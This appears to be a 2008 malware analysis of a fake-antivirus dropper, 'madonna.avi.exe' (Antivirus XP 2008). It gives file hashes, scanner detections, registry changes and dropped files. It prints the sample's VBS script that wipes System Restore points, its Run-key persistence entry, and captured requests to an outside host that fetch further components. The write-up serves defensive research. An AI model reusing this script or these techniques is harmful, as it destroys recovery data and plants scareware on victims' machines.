Allowing Outlook Express to display the inline graphics will download and display the following image (resized by me).
<h4>
File details
</h4>Filename: madonna.avi.exe
File size: 196096 bytes
MD5...: 55fc167c9b55093cbdb02650e22f508f
SHA1..: 20337c32262135deec3b2e5a453dd8216c526e7f
SHA256: 93c82ded9e214bd8abe9634405b446053c21a137188bf0c6d6adac9379180d9e
PEiD..: -
<h4>QUOTEFile madonna.avi.exe received on 08.22.2008 18:32:38
AhnLab-V3 2008.8.21.0 2008.08.22 -
AntiVir 7.8.1.23 2008.08.22 TR/Dropper.Gen
Authentium 5.1.0.4 2008.08.22 -
Avast 4.8.1195.0 2008.08.22 -
AVG 8.0.0.161 2008.08.22 -
BitDefender 7.2 2008.08.22 -
CAT-QuickHeal 9.50 2008.08.22 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.22 -
DrWeb 4.44.0.09170 2008.08.22 -
eSafe 7.0.17.0 2008.08.21 Suspicious File
eTrust-Vet 31.6.6040 2008.08.22 -
Ewido 4.0 2008.08.22 -
F-Prot 4.4.4.56 2008.08.21 -
F-Secure 7.60.13501.0 2008.08.22 Trojan.Win32.Monder.gen
Fortinet 3.14.0.0 2008.08.22 -
GData 2.0.7306.1023 2008.08.20 Trojan.Win32.Monder.gen
Ikarus T3.1.1.34.0 2008.08.22 -
K7AntiVirus 7.10.423 2008.08.21 -
Kaspersky 7.0.0.125 2008.08.22 Trojan.Win32.Monder.gen
McAfee 5367 2008.08.21 -
Microsoft 1.3807 2008.08.22 TrojanDownloader:Win32/Renos.gen!AU
NOD32v2 3380 2008.08.22 a variant of Win32/TrojanDownloader.FakeAlert.HC
Norman 5.80.02 2008.08.22 -
Panda 9.0.0.4 2008.08.22 -
PCTools 4.4.2.0 2008.08.22 -
Prevx1 V2 2008.08.22 -
Rising 20.58.42.00 2008.08.22 -
Sophos 4.32.0 2008.08.22 Mal/EncPk-CZ
Sunbelt 3.1.1571.1 2008.08.22 -
Symantec 10 2008.08.22 -
TheHacker 6.3.0.6.058 2008.08.22 -
TrendMicro 8.700.0.1004 2008.08.22 -
VBA32 3.12.8.4 2008.08.22 -
ViRobot 2008.8.22.1346 2008.08.22 -
VirusBuster 4.5.11.0 2008.08.22 -
Webwasher-Gateway 6.6.2 2008.08.22 Trojan.Dropper.Gen
Technical details
</h4>Registry changes.
- Changes the wallpaper and screensaver on the computer. Permissions for the user to change the background image and the screensaver are disabled also.QUOTEHKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen Saver "EulaAccepted"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_CURRENT_USER\Control Panel\Desktop "ConvertedWallpaper"
Type: REG_SZ
Data: C:\WINDOWS\system32\phcepaj0enej.bmp
HKEY_CURRENT_USER\Control Panel\Desktop "SCRNSAVE.EXE"
Type: REG_SZ
Data: C:\WINDOWS\system32\blphcepaj0enej.scr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "NoDispBackgroundPage"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "NoDispScrSavPage"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_CURRENT_USER\Control Panel\Colors "Background"
Old type: REG_SZ
New type: REG_SZ
Old data: 58 110 165
New data: 0 0 255
HKEY_CURRENT_USER\Control Panel\Desktop "OriginalWallpaper"
Old type: REG_SZ
New type: REG_SZ
Old data:
New data: C:\WINDOWS\system32\phcepaj0enej.bmp
HKEY_CURRENT_USER\Control Panel\Desktop "ScreenSaveActive"
Old type: REG_SZ
New type: REG_SZ
Old data: 0
New data: 1
HKEY_CURRENT_USER\Control Panel\Desktop "Wallpaper"
Old type: REG_SZ
New type: REG_SZ
Old data:
New data: C:\WINDOWS\system32\phcepaj0enej.bmp
HKEY_CURRENT_USER\Control Panel\Desktop "WallpaperStyle"
Old type: REG_SZ
New type: REG_SZ
Old data: 2
New data: 0
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components "GeneralFlags"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 05, 00, 00, 00
New data: 04, 00, 00, 00 - Disables the Windows System Restore feature which deletes currently existing restore points. It then recreates another restore point by re-enabling the Windows System Restore feature. This is performed by a vbs script.CODEstrComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Disable("")
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Enable("")
CONST DEVICE_DRIVER_INSTALL = 10
CONST BEGIN_SYSTEM_CHANGE = 100
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)
If (errResults <> 0) then
WScript.Sleep 10000
End if
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE) - Creates a Startup entry so that lphcepaj0enej.exe runs on every boot.QUOTEHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "lphcepaj0enej"
Type: REG_SZ
Data: C:\WINDOWS\system32\lphcepaj0enej.exe - Misc Changes.QUOTEHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier "InstallID"
Type: REG_SZ
Data: 4a573c18-9505-4bac-ab47-380607f448cb
Note: %Temp% is a variable that refers to the temporary folder. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).QUOTE%Temp%\.tt1.tmp
Date: 8/22/2008 7:02 PM
Size: 0 bytes
%Temp%\.tt1.tmp.vbs
Date: 8/22/2008 7:02 PM
Size: 1,002 bytes
%Temp%\Temp\.tt2.tmp
Date: 8/22/2008 7:03 PM
Size: 0 bytes
%System%\blphcepaj0enej.scr
Date: 8/22/2008 7:03 PM
Size: 118,784 bytes
%System%\lphcepaj0enej.exe
Date: 8/22/2008 6:30 PM
Size: 196,096 bytes
%System%\phcepaj0enej.bmp
Date: 8/22/2008 7:02 PM
Size: 625,208 bytes
%System%\Restore\MachineGuid.txt
Date: 8/22/2008 7:03 PM
Size: 78 bytes
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
<h4>
Notes
</h4>Upon execution madonna.avi.exe immediately changes your background to a new wallpaper.
Windows Scripting is then launched to disable and re-enable System Restore in order to clear all previous restore points and create a new one.
Internet acces is requested in order to download additional components. The file will be saved as %Temp%\.tt1.tmp
.tt1.tmp will be launched by madonna.avi.exe with some commandline parameters. The file will drop and execute 2 files.CODEGET /soft3/common/16.gif HTTP/1.1
User-Agent: Internet Explorer
Connection: Keep-Alive
Host: stat.avxp08.net
HTTP/1.1 206 Partial Content
Server: nginx/0.6.26
Date: Fri, 22 Aug 2008 16:43:30 GMT
Content-Type: image/gif
Content-Length: 1594051
- c:\Program Files\rhcapaj0enej\rhcapaj0enej.exe
- %System%\pphcepaj0enej.exe
An Eula will be displayed for Antivirus XP 2008 but as seen on the image you can't cancel install or refuse the license agreement. You can't even close the window.
Another vbs script will pin 2 Antivirus XP 2008 shortcuts to the startmenu.
Antivirus XP is now "installed" and it will perform an initial scan. I had to laugh when I saw the results, 2799 infected files on a clean PC ... wow.
Of course we do have some additional registry entries and files. The most interesting change is the modification of the User-Agent string.
Concretely this will give the following User-Agent when requesting webpages or downloads:QUOTEHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform "AntivirXP08"
Type: REG_SZ
Data: AntivirXP08
GET /updates/check.html HTTP/1.1Yes, "it" even checks for updates.
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AntivirXP08)
Host: www.avxp08.net
Connection: Keep-Alive
Thx Malekal_morte for forwarding me this nice vid.
